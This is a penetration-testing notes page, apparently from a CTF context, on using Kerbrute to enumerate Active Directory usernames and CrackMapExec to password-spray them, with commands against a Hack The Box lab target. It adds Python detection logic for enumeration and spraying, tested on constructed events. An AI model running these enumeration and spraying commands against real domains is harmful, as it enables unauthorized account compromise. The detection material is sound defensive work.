# Kerbrute

## Overview

Brute-forcing domain usernames is possible with **Kerbrute**. This is valuable from an information-gathering perspective and can lead to some quick wins.

After finding some usernames, you can password spray those accounts using their usernames as passwords. This is very common in the real world.

{% embed url="https://github.com/ropnop/kerbrute" %}

## Kerbrute Attack

#### Enumerate for users

```bash
kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL
```

{% hint style="info" %}
Example username wordlist (SecLists): `/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt`
{% endhint %}

<figure><img src="/files/xZLjWppNB8nrL0tmA05c" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>

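#### Password spray using `--no-brute` to avoid account lockout

With `--no-brute`, CrackMapExec pairs each line of the user list with the same line of the password list, so every account receives a single attempt.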

```bash
crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb
```

<figure><img src="/files/6tIAAMJ7S4S6oar3gZZ5" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>
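
On the defending side the two steps above leave different traces: with Kerberos auditing enabled, enumeration of nonexistent names appears as event 4768 failures with result code 0x6, and an SMB spray appears as failed logons (event 4625). The detection logic below is an added example, not part of the original page or of Kerbrute; the simplified event field names, addresses, account names and thresholds are assumptions, and the sample events are constructed.

```python
from collections import defaultdict

# (event id, status code) -> finding label.
# 4768 + 0x6: TGT request for an unknown principal (KDC_ERR_C_PRINCIPAL_UNKNOWN).
# 4625 + 0xC000006A (sub status): failed logon, valid account, wrong password.
SIGNATURES = {
    (4768, "0x6"): "kerberos_user_enumeration",
    (4625, "0xc000006a"): "password_spray",
}

def detect(events, window=300, min_accounts=10):
    """Flag sources that touch many distinct accounts inside one time window.

    Counting distinct accounts per source (not failures per account) is what
    catches one-guess-per-user activity that stays under lockout thresholds.
    """
    buckets = defaultdict(set)
    for ev in events:
        label = SIGNATURES.get((ev["id"], ev["status"].lower()))
        if label:
            key = (label, ev["src"], ev["ts"] // window)
            buckets[key].add(ev["user"].lower())
    findings = [
        {"type": label, "src": src, "window_start": slot * window, "accounts": len(users)}
        for (label, src, slot), users in buckets.items()
        if len(users) >= min_accounts
    ]
    return sorted(findings, key=lambda f: (f["window_start"], f["type"], f["src"]))

def constructed_events():
    """Constructed sample data: simplified event fields, hypothetical names."""
    ev = []
    for i in range(40):  # one host requesting TGTs for 40 unknown names
        ev.append({"ts": 1000 + i, "id": 4768, "status": "0x6",
                   "user": f"guess{i}", "src": "10.0.0.50"})
    for i in range(12):  # same host, one wrong password each for 12 accounts
        ev.append({"ts": 1300 + i, "id": 4625, "status": "0xC000006A",
                   "user": f"user{i}", "src": "10.0.0.50"})
    for i in range(3):   # one user mistyping a password: a single account
        ev.append({"ts": 1400 + i, "id": 4625, "status": "0xC000006A",
                   "user": "jsmith", "src": "10.0.0.77"})
    return ev

if __name__ == "__main__":
    for finding in detect(constructed_events()):
        print(finding)
```

Fixed windows can split one burst across a boundary, so a production rule would use a sliding window and tune `min_accounts` against normal traffic from shared hosts such as proxies or jump servers.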


